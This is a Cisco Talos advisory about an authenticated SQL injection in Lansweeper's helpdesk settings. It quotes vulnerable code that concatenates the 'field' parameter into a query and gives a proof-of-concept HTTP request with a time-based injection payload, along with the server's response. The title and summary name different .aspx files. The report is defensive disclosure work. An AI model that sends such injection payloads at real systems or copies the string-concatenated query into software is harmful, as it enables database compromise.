Talos Vulnerability Report


Lansweeper lansweeper HelpdeskSetupActions SQL injection vulnerability

February 28, 2022
CVE Number



A SQL injection vulnerability exists in the HelpdeskEmailActions.aspx functionality of Lansweeper lansweeper A specially-crafted HTTP request can cause SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.

Tested Versions

Lansweeper lansweeper

Product URLs

lansweeper - https://www.lansweeper.com/

CVSSv3 Score

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H


CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)


Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management and compliance and audit purposes.

An exploitable SQL Injection vulnerability is related with an action : Configuration -> General Settings and is located inside \LS\CF\HelpdeskSetupActions.cs file. Let us take a close look at the vulnerable source code :

Line 155	private static void EditSetting()
Line 156	{
Line 157		Page page = (Page)HttpContext.Current.Handler;
Line 158		HttpContext current = HttpContext.Current;
Line 159		JsReturnObject jsReturnObject = new JsReturnObject();
Line 160		try
Line 161		{
Line 162			General.ValidateCsrf();
Line 163			string text = current.Request["field"];
Line 164			Dictionary<string, string> dictionary = new JavaScriptSerializer().Deserialize<Dictionary<string, string>>(current.Request["value"]);
Line 165			object obj = dictionary[text];
Line 197	else
Line 198	{
Line 199		object obj2 = DB.ExecuteScalar("Select " + text + " from " + text2);    

As we can see, field parameter is not sanitized, and later in line 199 using string concatenation, it is combined with the SQL query. To trigger this vulnerability, an attacker must be authenticated and have rights to change any setting related with Configuration -> HelpDesk Setup.

Exploit Proof of Concept


POST /configuration/HelpdeskSetup/HelpdeskSetupActions.aspx?action=editsetting&field=@@version;WAITFOR DELAY '0:0:03'--&type=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 280
Connection: close
Cookie: UserSettings=language=1; custauth=username=admin&userdomain=admin; ASP.NET_SessionId=hpp41pklmqnw0za1jwrw2oru; __RequestVerificationToken_Lw__=INRfH5supEBaKPkvKWwJOJulc5TL9awnpugCjadGVpN9U37ot7dDEAReoE5xyXfujDiJmmHz/XlJU o4d7i/VGC4GDoetTwuihcvFlHWgsbEz3zAIhXcZQfYla3GycAqu46uHVvXM8b4nOfeJoZ4TXVzGI0apUQPM7baaUJsPrk=

value={"@@version;WAITFOR DELAY '0:0:03'--":1}&__RequestVerificationToken=GRx76L/CQv7ghwFJezK1xXT4LqvWQNc/zVW4MKPNFl4miGePcXr0MpJACtL4eqJDxKSuO31kW2kWrBpvWeL1e1iawm/GHunSVEX6aoBgN3WRWra1zFiIVajL6fRYqcv+Ofh3CUcDMVdskErjp6YYKvpu4ZsoPLXLEC8B43p81CA=


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 15 Dec 2021 11:59:46 GMT
Connection: close
Content-Length: 183

{"ErrorType":"","Error":true,"Emsg":"Incorrect syntax near '@@version'.","AddedRows":[],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}


2022-01-10 - Initial vendor contact
2022-01-11 - Vendor disclosure
2022-02-21 - Vendor patched
2022-02-28 - Public Release


Discovered by Marcin "Icewall" Noga of Cisco Talos.